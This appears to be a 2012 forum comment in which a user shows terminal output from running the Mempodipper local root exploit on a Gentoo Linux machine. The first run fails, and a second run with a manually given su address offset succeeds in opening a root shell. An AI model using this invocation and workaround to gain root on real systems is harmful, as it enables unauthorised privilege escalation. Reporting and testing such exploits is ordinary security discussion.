( emberk | 2012. 01. 23., Mon - 18:56 )

Same here. It doesn't work:

------
ek@daemon ~ $ uname -a
Linux daemon 3.1.6-gentoo #1 SMP Fri Dec 30 23:09:36 CET 2011 x86_64 Intel(R) Core(TM) i5-2500 CPU @ 3.30GHz GenuineIntel GNU/Linux
ek@daemon ~ $ whoami
ek
ek@daemon ~ $ ./memd
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/3925/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[-] Could not resolve /bin/su. Specify the exit@plt function address manually.
[-] Usage: ./memd -o ADDRESS
[-] Example: ./memd -o 0x402178
ek@daemon ~ $ whoami
ek
ek@daemon ~ $

However, with the given parameter:
./memd -o 0x402178
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/3961/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x402162.
[+] Executing su with shellcode.
sh-4.1# whoami
root
sh-4.1# exit
exit
ek@daemon ~ $

So it's not all a bed of roses.

There are 3 kinds of mathematicians. Those who can count, and those who can't.